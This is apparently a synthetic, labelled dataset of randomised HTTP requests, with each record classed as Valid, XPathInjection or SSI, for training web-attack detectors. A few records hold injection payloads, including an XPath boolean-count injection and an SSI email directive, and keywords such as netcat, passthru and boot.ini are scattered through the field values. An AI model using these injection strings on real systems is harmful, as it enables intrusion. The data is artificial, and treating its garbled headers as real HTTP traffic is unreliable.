Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jan 04 09:47:24 CET
Last-Modified: Sun, 07 Feb 10 19:44:36 CET
Host: 219.148.120.107
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, deflate;q=0.9
Accept-Language: ir8rsm-fiec, foDackh-yboiervr;q=0.3, rn0bim-matfenzg;q=0.5, znt-enae7at, ohndXD-hRo;q=0.4
Cache-Control: only-if-cached
Client-ip: 18.214.52.39
Cookie: lnxytesg=623793;j2f=nwou;iNEiceoAh=bEDE2E;neeavw=3849558
Cookie2: $Version="05"
Date: Wed, 17 Mar 04 01:37:50 GMT
ETag: "VA6Cmm7Y3oyhrr3oP."
Expect: fttc=bojaii
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Tue, 16 Feb 10 12:00:25 CET
If-Unmodified-Since: Tue, 02 Jan 07 24:25:14 UTC
If-Match: *
If-None-Match: "4FQ.AeBzXHrO8szdOssO"
If-Range: Thu, 23 Dec 04 14:52:25 GMT
Max-Forwards: 7841
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: a02oWr Sqhe=ioxt
Range: 8-21126,9-397638
Referer: /idfeo/vhcpas/mGq4Ne/iJLooht/otylesie.jpg
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 0.8; St-ca; rv:7.2.8) Gecko/10822767
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7712x8519
Via: 7.0 255.226.40.56, HTTP/5.2 www.eilto.html
Transfer-Encoding: deflate
Upgrade: blYO/9.0, dN8w/2.7, Ooa0/5.1, NcTat/8.3, alwi/9.7
Warning: 605 165.118.208.207:59007 "stw4t" 
X-Forwarded-For: 68.186.72.84
X-Serial-Number: 0421946796861302632
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

3stdincmd@N=9013&p6Ubody81VJnetcatg=0ci%[&aoodaloleT=4Ni<Mquehp&holbs=472&aoiaCexeItsssIe=elm1heEK7&it1veQusoeoPae=275204&aiehne=340&E2mZAf=aRp.&udiqrhE=ec&zhHa=yt5hm ee4&allrm4=5replaceqN9fromttrvuq&ftm=1y&ZOoLBfpQMF=ovHOIrVpFPl&oeoIonhme=tePw

End - Id: 33189
Start - Id: 27047
class: Valid
GET /eejo9to4uoa/4lo/vsock_streamCnnML/cejTrRymnq/0thAow/it8oyedht6.mspx?t4tqtcqt=ewaT HTTP/1.0
Host: 128.219.139.169
Connection: nitoalu
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.3, deflate;q=0.4
Accept-Language: hpro7-o;q=0.2, 2-y, 6amB-jsem;q=0.8, fehe0t-NtlA, d-seoht
Cache-Control: max-age=9
Client-ip: 206.160.126.16
Cookie: g6nGvhei=8tnoali delete7srml[idzsg;f9=tu4JtdfgQXPj;cfw=dhibidf6mbpf
Cookie2: $Version="9"
Date: Fri, 02 Nov 07 06:52:16 CET
ETag: W/"E0@zu4aEKWwFLM0gwK"
Expect: exrdAe=nwwetE
From: caaati2g@ijas.biz
If-Modified-Since: Sun, 03 Oct 04 13:14:18 UTC
If-Unmodified-Since: Mon, 11 Jun 07 08:01:44 CET
If-Match: *
If-None-Match: "6VSoSLD@fb.Xfsrh"
If-Range: Sun, 20 Aug 06 16:26:20 UTC
Max-Forwards: 3923
MIME-Version: 2.2
Pragma: eej='tdh6'
Proxy-Authorization: Basic bGFpZHRpOnpEdUFPaQ==
Authorization: esgapb hq5a=aemee
Range: 34-,11052-0053,7-3
Referer: http://f9eNhut.com/Vtt3ae/rpeT/8orzj.rar
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/4.5 (X11; U; SunOS sun4u 8.0; ln-gg; rv:7.0.1) Gecko/67814271
UA-CPU: PowerPC
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6860x985
Via: fme/1.0 www.hIad.tiff
Transfer-Encoding: on7cIc; ryznha=tse6
Upgrade: Uoyod/7.3, 5n5h/5.7, iesdd/8.2, raeR/3.0
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 140.151.15.216
X-Serial-Number: 894392
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27047
Start - Id: 33344
class: Valid
POST /KuUljDB3@AHBQ/y_0vfhk9/d_NwImj.v/y.xVJZoIL/aM_Zu7AKU9kU3Mo/5nisn0/gtaCVw1ceRGrAs7/BlPz-23Z/cmdCab6Yinsert5/sF8H/tEajnTby5o5sts/CU.mspx? HTTP/1.0
Content-Length: 266
Content-Language: jori8a,q3liy
Content-Encoding: identity
Content-Location: /stmeuu/zsbCl0/as4h/cuza.js
Content-MD5: YWU5ZWVsdGRkbGVkbHNzSA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Sep 04 18:10:27 GMT
Last-Modified: Sat, 15 Dec 07 19:04:07 GMT
Host: 158.12.156.156:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8, iso-8859-4;q=0.7, iso-8859-8-i, x-mac-roman;q=0.0, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 219.255.155.213
Cookie: s70thb9Hioreiim=oyseyeuiy;eoonanir5eaogh=tyTl 
Cookie2: $Version="144"
Date: Fri, 14 Aug 09 16:28:04 UTC
ETag: "00_rMhSvhU_enOA"
Expect: ybyru8n
From: gn93As@dhNYgeNDu.be
If-Modified-Since: Tue, 17 Feb 09 13:48:27 GMT
If-Unmodified-Since: Fri, 09 Apr 10 17:57:51 GMT
If-Match: *
If-None-Match: "zYCWjbB4uzGNTVY"
If-Range: Sat, 03 Oct 09 11:00:50 CET
Max-Forwards: 8
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: euet eprhhwtr=g2dt
Authorization: NTLM bnFpMGhkaWJlbUhldW9lbkFMaW1nMHNzYTdxdDlnZnRydHV6aGFy
Range: 1-49146,702-2640,-680433
Referer: /et7oal/1etofs.php4
TE: gzip,chunked,chunked
Trailer: Proxy-Authorization
User-Agent: EIwktneElg4h
UA-CPU: MIPS
UA-Disp: 8652,975,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 6.7 218.150.72.111:7, HTTP/8.7 159.61.218.58, HTTP/1.2 38.99.231.240
Transfer-Encoding: deflate
Upgrade: 6stde/0.3, ewtMfk/8.5, rt9eT5/1.5, nSTo/9.3
Warning: 231 205.9.41.94:7104 "5bslathe9ce" "Sat, 19 May 07 07:06:34 CET"
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 93235551323019151899
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ilmrzlwtE=i@ko[h(tSo \systemasalocationn9&rpmcr1yrb5thoao=5272747&tngseg=e8)tE&QKnFS=boLKfObIP5h&6eel=rP_Oiuqxco&pdmailftpvbscriptfNW=/am~5etconnect4niG&OoGE13e=6&aWrf_Zd1=aejaSg8e44Gsoscr&Cnl0as=CqceheUiiqexq&corhrt3yvaneu=01&aA0JpYi2OjkM=eGBm2ostgmre

End - Id: 33344
Start - Id: 35567
class: XPathInjection
POST /eanCunm/stfen/zV2h8hZBcjUm/c4NIIh-zk/sinb1xnG63Reec/tD/tFKhjGoP3q/fK2UWOzXXpbF/f2A5kk/DensUoteruxaR4g/ieiseltneoh/simtiveeqrsH.nsf? HTTP/1.0
Content-Length: 313
Content-Language: 5
Content-Encoding: compress
Content-Location: http://www.eneh.biz/gnsec/gIs0iUf/sagshtpv/hOrAsqo/miuorh.asp
Content-MD5: RGVhcGVmdW1yc2VhYWdlZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jul 04 17:58:10 UTC
Last-Modified: Wed, 12 Sep 07 06:52:20 GMT
Host: www.anntp.de
Connection: 6lnrer
Accept: */*
Accept-Charset: iso-8859-7, isiri-3342
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale
Date: Sun, 14 Mar 04 20:37:27 CET
Expect: n4hotni
If-Modified-Since: Mon, 29 Jun 09 21:17:12 GMT
If-Unmodified-Since: Mon, 18 Jul 05 18:38:03 CET
If-Range: "FgdN5eUc4Q-yS@HkQ"
Max-Forwards: 0720
Pragma: odde=rt1mros
Proxy-Authorization: Basic ZkxpYW86bXR5OWh1Mg==
Referer: http://www.ee8EtAlt.de/sgrtc/8ewf/heme/dwuhuze.php4
User-Agent: fiwlhTnt6e (nPe5os; ebDaChPj; sxigH-Z; u6Flij; fpsENi)
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 101x5961
Via: 8.2 86.63.40.232
Warning: 503 www.2ereIoft.tiff "stHrxpgsdfyTd3soor" 

ks9hes=4904186&aismudnt=tOBXfaYa&9ezaoitnlwnueoh=lfniBw&Qr4KVSWy5zE=003798&es=LHivg']   |     P  |   //user[ name/text(  )   =    'hlttA&6G48VfAMKdN=7777087&oQbGj4lcK6b9=538498&vdonbt5w1ls4re=scroalleey4objectosdu&dJ2htent9os7ps=lL<aent5uagogeeuunionia&veah8hdaracFbc6=wimg&fUARexec=yw02

End - Id: 35567
Start - Id: 39185
class: SSI
PUT /uiatetatibd4mfa/eiahLorfteeeaso/mTlMT9KrLD/ge099/EHo1sHuW/enLhWE2-_4cQ6/PoNhSrhl34oeston/pSqmBk@N.gif? HTTP/1.1
Content-Length: 514
Content-Language: 3mdtet
Content-Encoding: gzip
Content-Location: http://mhfoe.net/ietdn2n/eolI3tha/iWftn/pgtfd4t.cfm
Content-MD5: NXBoeXd0aGY1eHVmYU9zbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Fri, 07 Jul 06 05:59:18 GMT
Host: www.YF18e.biz
Connection: close
Accept: audio/*
Accept-Charset: us-ascii;q=0.8, x-mac-japanese, euc-tw;q=0.0, x-mac-turkish
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 148.41.215.213
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="261"
Date: Mon, 05 Feb 07 08:07:55 UTC
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Fri, 13 Feb 04 08:42:47 CET
If-Unmodified-Since: Mon, 20 Nov 06 22:22:52 GMT
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: "utzZOFj.idzt6x4iPjC"
If-Range: Mon, 19 Dec 05 02:18:24 GMT
Max-Forwards: 2257
MIME-Version: 4.8
Pragma: gelaM='toifs'
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Digest response="560Bec53720bDF014BF8caFdef03FDe5"
Range: -4,-09852,71-
Referer: http://www.ee5not.biz/iR3hneih.mp3
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 9.1; ec-Bg; rv:0.3.7) Gecko/47912362
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: 6.1 146.14.85.104, HTTP/0.2 www.7em6i.png, 7.6 www.ets5i.gif
Transfer-Encoding: gzip
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~

t8esTa5oeoNeL=ho0_LCiUWJUp&nO3eiMapcsr0n=| re&oqkatWPWMn=skr~eIc&Sebrd5etnhuee2=l2irt&hizeralAhn=4 uo0mikpdejeaw$osock_streame&Mspw=886&eoatqleelepn=<!--#email fromhost="www.arhjlnso.com" tohost="mailbox.nedn.com" message="epofh yH2iie naiesfe rtY" fromaddress="mnihq.com" toaddress="oRill.oerete.com" subject="5" sender="ncl5.com" replyto="1s9aas.com" cc="rhda" inreplyto="nrl 0bn1 iROqCl" id="hirmail" -->&Rfdl=edhzant7 io&95E=t]d

End - Id: 39185
Start - Id: 9444
class: Valid
GET /mlOle/9Z5htacces7ki/ibuVov0passthruQhC0/tteE0rTcubtoeosswisx/twlb3iltDxole3dta/sHR-xOeFz8pyzPqdmUW/o_jhkCb..jsp?xmvm=hGbXF4hG&vns=h&ieze=+TsT%3Etn&4srvfove=2t+7mnaeabhh&eseRrxdDnda5eeh=87631&3mee=3 HTTP/1.1
Host: www.0o1tmR.uk:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tqnhei-Tlneguoo;q=0.9, nes-0uAsom
Cache-Control: f='w'
Client-ip: 112.34.95.51
Cookie: bodyxTR4WcGA=B2a 
Cookie2: $Version="00"
Date: Sun, 09 Oct 05 07:58:29 GMT
ETag: W/"@8QA_vWMBay-vYqC"
Expect: etai1l
From: ieue@hoegnHqytl.be
If-Modified-Since: Sun, 18 Jul 04 21:38:01 UTC
If-Unmodified-Since: Sat, 30 Apr 05 09:45:28 CET
If-Match: "IyUauyBJuO6IxG0qf"
If-None-Match: *
If-Range: "KEOV9gHPx_y4VxU3n"
Max-Forwards: 9219
MIME-Version: 4.1
Pragma: adtt=rn
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Digest nonce
Range: -361938
Referer: /lntFs/naonirNB/tpaf/nlhHnIoi.conf
TE: trailers,chunked;q=0.0
Trailer: Date
User-Agent: iiejq2a (2uYBdBCeM6; vkLbkyhKf)
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: 0.9 19.127.153.95, HTTP/5.6 144.101.120.231, 6.3 110.31.100.113
Transfer-Encoding: srfn
Upgrade: 2saP/8.1, hoai/5.7, rttsrq/0.0
Warning: 339 144.218.59.163 "gnvogsawxtUq" 
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9444
Start - Id: 21000
class: Valid
GET /3P.CZV@n/eniqnt5h/Zr/laa/oph1GWHIvvh8KFlDC1rF/oetastRong/wtZlibt/hPErcxVw-J/fKDrj-d/rGGc_5.jpg?z.sh3a=aany0rlk1op4&din@xvb=lsoHio7tT%5C&wcehtC=2832726&5olRcstoao3sT=7EqwgumTki&nfsil51el=ltiHtpscript22passthruatsss&h.J@PZoDNSq=te&EMXT5Stzg=82950278&ognleuatyuc=resduaa5d&e7sttohbdiftt7=2&iN4ye1khictoErn=edkenarosea3nrhEpe&eeaw=24&ZhioHw@vbscriptmj.1=ibldeeeg HTTP/1.1
Host: www.nnl7eow1ec.uk:7307
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nyt8-r, efa0p-nStziIa, dl-umebots;q=0.0, dZnadhdM-zrpdisfT;q=0.9, re161tar-P9c;q=0.6
Cache-Control: no-store
Client-ip: 241.58.191.36
Cookie: 4sa8utn=(Y;txuhbeDo=72412143;ctosb=Dspn;qctohpoe5=twn+el;D9jM0R=hB0b
Cookie2: $Version="40"
Date: Fri, 02 Feb 07 05:33:09 UTC
ETag: "3fpwc7WtKU.pmoBi1fR"
Expect: 100-continue
From: ahynt@dfll.st
If-Modified-Since: Wed, 17 Dec 08 19:58:32 UTC
If-Unmodified-Since: Wed, 18 Jun 08 17:24:13 GMT
If-Match: "46KX2u.BNfi0JlsPwkQj"
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 6.4
Pragma: f04rA='nhoz'
Proxy-Authorization: Digest response="a0f19d231EFdE2b1dCCD9A5Daa596122"
Authorization: NTLM TFNzbnJmYWV0dHRsbmRpaW1lc29lOHdibHJhaXR2aW1waGFvYg==
Range: 9864-14,-53
Referer: /rvsDpty.mdb
TE: gzip;q=0.2,deflate,trailers
Trailer: If-Modified-Since
User-Agent: rhi5et3hHehv
UA-CPU: 68000
UA-Disp: 665,0570,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: FTP/1.9 167.125.154.3, FTP/3.2 www.AsrEhwea.jpg, FTP/3.3 www.sAle.gif
Transfer-Encoding: gzip
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 708 www.ngtwdo8.jpeg "z2owz8ertedtnrau" "Fri, 02 Jan 09 01:16:00 GMT"
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 72612328248662320095
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21000
Start - Id: 7752
class: Valid
POST /otsacdjutOr/OC/pDWKH9o6T_uV5/position.q_Ywp-5pQBzXtQ/n8rjVDXRvUZ26dt/rB05zNu/QhttpD-mc/eG8@LJL2Ioqc9c.jpg? HTTP/1.0
Content-Length: 284
Content-Language: rrNma,lhnq0d,tuabhnu
Content-Encoding: gzip
Content-Location: http://gaSiel.fr/eaw4/aLoouI.gif
Content-MD5: b2FjYWxnU3JxM0hyb3JpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Dec 09 20:42:48 CET
Last-Modified: Mon, 04 Feb 08 18:45:41 UTC
Host: 202.148.41.246
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.5, koi8;q=0.1, hz-gb-2312, iso-8859-7, iso-8859-6;q=0.1
Accept-Encoding: gzip, identity, deflate;q=0.6, identity, gzip
Accept-Language: ui12-2N, sraapea-a, 3-tenev6oa, ea-5eaoab2;q=0.1, 2a-aar0a
Cache-Control: only-if-cached
Client-ip: 204.252.123.33
Cookie: 6p5dneia=9044651;hcr5rhhom=aai;BcQo0xWfC=nAzjjZwB5iF;le5t5n9hcgdtIDn=7846
Cookie2: $Version="8"
Date: Wed, 16 Feb 05 18:31:16 GMT
ETag: "HI6BanbadPzOfXxPDsJ"
Expect: lsnpOs
From: Issg@FSsymatcdn.biz
If-Modified-Since: Sun, 18 May 08 03:45:37 UTC
If-Unmodified-Since: Tue, 31 Aug 04 18:57:45 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 048
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic bm50aXRjcjpzbzhs
Authorization: NTLM dGs2b2NpZXpwbnJ1dGF0dGFoZXRvdGlpZWV0c3Vsb2VndGVVaDBzblhh
Range: 42-,574-0,04-96557
Referer: /iee1/ib70t/hxoria/barjpmj0.gz
TE: trailers,trailers
Trailer: TE
User-Agent: em.3n1lX@z http://www.lem0oa.be
UA-CPU: PowerPC
UA-Disp: 0857,811,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2784x639
Via: HTTP/5.6 104.201.237.222, HTTP/5.6 180.119.106.12
Transfer-Encoding: compress
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 140.83.125.8
X-Serial-Number: 755834931599886
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

nMtgioaaa=nullEtud&glo3waeasod=LPcha&oe6dmiasirrel=c$ur&yonatoToiceo2o=elcH&gbTnc3pwjxrDe=5741030&skAyT=754&nsieLesnr=ek_&tSahsfr=au_M68IU_wC2&7oist0toqdu=dtrgttibiwncfngc&zWe1rrT=ssu&ot0=erbLe7&F-p_-in6k8rm=74787&tgesizh7b2xsu=aap&aaj=wyratboHirtVe 8&nfeteywanslDe=psneiaphet50symb

End - Id: 7752
Start - Id: 49962
class: XPathInjection
GET /eLuZmO/GesdoirefIejtd/loseetidoleFeut/WU@inOrcpRI/o7egqagvhaz.bin?JsddOs1fOnwQbk=lFbG0Hl40e7&8Cp_@p-=i37A_Mf-9l0t&dOpsGe=as&be=00&YunionyH_yqZjexec=22&OhAeewlVNalXo=Hcor%27+++++or+++6++%3C++count%28path%2Fchild%3A%3A*%29++++or++++%27ckIiwre%27+++%3D+%27&sOutqrttykAydoc=qsxUwuZkdDjo HTTP/1.1
Host: www.euiellx.uk:80
Connection: t8oridt
Accept: application/zip;q=0.5
Accept-Charset: iso-8859-7
Accept-Encoding: compress, identity, gzip
Accept-Language: *;q=0.6
Cache-Control: min-fresh=488
Client-ip: 125.102.128.225
Cookie: eng9munpCcs2ao=s9dhUNlhW;uTetCtczrn=084043
Cookie2: $Version="5"
Date: Fri, 12 Jun 09 05:22:52 GMT
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: jOaulrtZ@oAt2Eo.gov
If-Modified-Since: Tue, 06 Feb 07 11:19:53 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: "Cp3Q1Puvr6h99R7X5L"
If-None-Match: *
If-Range: "toT.35L5Qsga2dl"
Max-Forwards: 679
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: Digest username="eo31e"
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 73758-,-8229
Referer: /zerm7d/eiandsa.gif
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/2.6 (X11; U; Linux i586 7.1; oc-Ha; rv:8.5.8) Gecko/72132669
UA-CPU: x86
UA-Disp: 5750,1984,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 207x5488
Via: 8.9 www.Xyas.htm:179, 4.1 92.231.68.135
Transfer-Encoding: gzip
Upgrade: e4ie/0.4, c9r/4.8, ku8lnp/5.4
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49962
Start - Id: 18848
class: Valid
GET /zennnlebn.bin?do=mKg&R2satnesae=id_y86_gWi&Y93H=4503641&intii=boot.inisgtt&a7arge2eagER=29&hesTeo=liaDi&smitheotihnl1=Raia0gz3dboyjoer&itfNpiiNYesl=ndeeri85AIw&auiecEhafl0f=6&l1cntfpn32kr=7932&.E24VTNzPZD8=00198028&lrnemaekba3uej=rpTFgaV67 HTTP/1.1
Host: www.aziId8vSo.biz
Connection: keep-alive
Accept: audio/*;q=0.6, image/jpeg;q=0.7, text/plain
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 228.55.43.33
Cookie: fEondt2=558786966;Hhtewsdnaawe=3955849;pirs0ooput=6;dceN3s=eyn7llfhbhlect;ehauo=yZlegt
Cookie2: $Version="1"
Date: Mon, 06 Dec 04 02:16:35 CET
ETag: "Y@rExN4rE4Iovx2vndI"
Expect: 2o6be6fd
From: oiir0@raaeopgcl.it
If-Modified-Since: Mon, 17 Jan 05 13:01:29 CET
If-Unmodified-Since: Thu, 13 Sep 07 04:22:15 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Feb 05 05:47:03 GMT
Max-Forwards: 9199
MIME-Version: 1.1
Pragma: eeuMo='useIdo'
Proxy-Authorization: jniene rlc0of=edatai
Authorization: Digest response="abD931eE764D66e0717a8EFA0D89accb"
Range: -4
Referer: http://dtalr.org/9gisl/4h5lcoo/ee9cmdlh/eR3eu/toDnb.js
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.5 (X11; U; Unix 8.4; wh-ga; rv:2.9.3) Gecko/16456599
UA-CPU: MIPS
UA-Disp: 8023,7803,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 928x9572
Via: 7.0 8.251.132.30, ueAHe/1.0 175.216.158.173
Transfer-Encoding: compress
Upgrade: hhse/5.8, OOtIlr/6.6, swie/9.3, mroc/7.7, taRta/6.4
Warning: 911 www.mclwl.shtml "mteatliekhoncjtInek" "Tue, 16 Jan 07 20:18:18 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 8138044161
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18848
Start - Id: 9950
class: Valid
GET /ol@I6IWRld0l7GH/1te.css? HTTP/1.1
Host: 74.22.196.22:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.1, us-ascii;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 150.172.121.230
Cookie: ji3r=nj2zTc;oanrtelraie=7
Cookie2: $Version="3"
Date: Sun, 11 Jun 06 12:43:06 GMT
ETag: W/"0Fozrq92kBMb6XIAQMM"
Expect: tLno=n2raJi
From: snyou@r8tka9etrf.de
If-Modified-Since: Thu, 29 Nov 07 11:34:58 UTC
If-Unmodified-Since: Wed, 17 Aug 05 17:33:42 GMT
If-Match: *
If-None-Match: "aUIUYqr8oG7NQ5B"
If-Range: *
Max-Forwards: 639
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlobGZlNnJyc2FlaTBiczhiOFJyYWxhbHNwdGVzdXQydEF5RXR5ZQ==
Authorization: NTLM dGlHd2VudHlkM3p0dDh0c0NzdGl3b2VEb2JvOWdTdjltaHBpYXRnNG1OYWFrcmg=
Range: -96
Referer: http://www.noqit.com/3sEHok/rirrne0.gif
TE: trailers
Trailer: Via
User-Agent: Mozilla/0.4 (compatible; ld0aoo1is; Mac OS X; zcrd91euyd)
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 596x007
Via: iuies/3.0 10.102.202.24, HTTP/1.5 www.rHeml.shtml
Transfer-Encoding: deflate
Upgrade: EIecm6/9.9, iperio/2.0, nea/8.0, testdg/7.3, TvsW/8.2
Warning: 270 www.yaeei.htm "Qooirdi3rryl8Lsoii" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 939778978647707
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9950
Start - Id: 21830
class: Valid
GET /sWsP7/ytIHs7tw/5tseygwebkRe8ayiweLt.shtml?2rasses=9d%24%3FNfxoOtcEw&7if9reRthtr=7&NRboot.ini@=3095&nkiraTonh=deletetde%25+fsd&hleofr6b5scs=iVbe2upXc&hC=03925051&thjmoTsmoH=899&nai6c7nuoms=8Fall_s&ysi1q7amelmnsj=Tiid&kiT=rnhbr%28nctho HTTP/1.1
Host: www.yyAbata.org
Connection: keep-alive
Accept: audio/x-wav, image/gif;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: i-Temrc;q=0.7, uEw-eehmd;q=0.8, adx-c3st;q=0.6
Cache-Control: no-store
Client-ip: 254.135.226.163
Cookie: evrhRoaccf=esspbnhdoheer;ieyvt=QwherelE;0xdA=nreplaceEo
Cookie2: $Version="3"
Date: Fri, 25 Apr 08 23:12:49 CET
ETag: W/"R5lCvqAM8NjhhWf0sjS"
Expect: uaxgyeu
From: eZ4Hroh@tl1ethO.ch
If-Modified-Since: Sun, 28 Oct 07 08:39:12 GMT
If-Unmodified-Since: Tue, 04 Nov 08 02:13:57 UTC
If-Match: "ENTkZkSLygFXm@zwx"
If-None-Match: "lApJA5xVfjZ3gu_2o"
If-Range: "ePSVSzDoQJtPtL9"
Max-Forwards: 02
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic eXR1czBlczpvcm5vb2E=
Range: 65-,335-
Referer: /4aqpoo/xettR/9rihe1.bin
TE: chunked,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.1 (X11; U; Linux i386 3.4; nw-Ot; rv:5.9.1) Gecko/62410829
UA-CPU: x86
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3901x4660
Via: HTTP/3.8 www.scluqo.jpeg
Transfer-Encoding: gzip
Upgrade: odPV/9.4, lhi/7.8, ads/8.6, gll3/8.2
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 328079
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21830
Start - Id: 164
class: Valid
GET /UNnpckte.htm?1q=93&oheHedrt5ade=fdFdwinntnrqzfoy&w5=3577&fedp=L0r%3Er4group+by5ht+efxucftp&tdnl=oag8&oZ9Ev=systemeedr+Mp&otll=oss%29t HTTP/1.0
Host: www.zsnnits8l.uk:80
Connection: keep-alive
Accept: video/quicktime;q=0.1, image/jpeg
Accept-Charset: macintosh, shift_jis;q=0.8, x-mac-arabic;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 121.142.162.0
Cookie: th=5uacopy5hlTaioj
Cookie2: $Version="728"
Date: Tue, 21 Feb 06 06:21:29 CET
ETag: "f61ret1R3hv18txQ0Z"
Expect: onwo8=ittano
From: Ilbtrg@snmsRsihc.uk
If-Modified-Since: Wed, 04 May 05 17:42:00 GMT
If-Unmodified-Since: Mon, 07 May 07 03:27:54 UTC
If-Match: *
If-None-Match: "4XCA1NJc9e9M9I1Ny"
If-Range: Thu, 01 Dec 05 15:04:51 CET
Max-Forwards: 851
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: NTLM YWFub2ljYmVlb3V4bmV6SXljM290aXEyRVU5ZXlmZW54b3E=
Range: 227994-,-2,-88
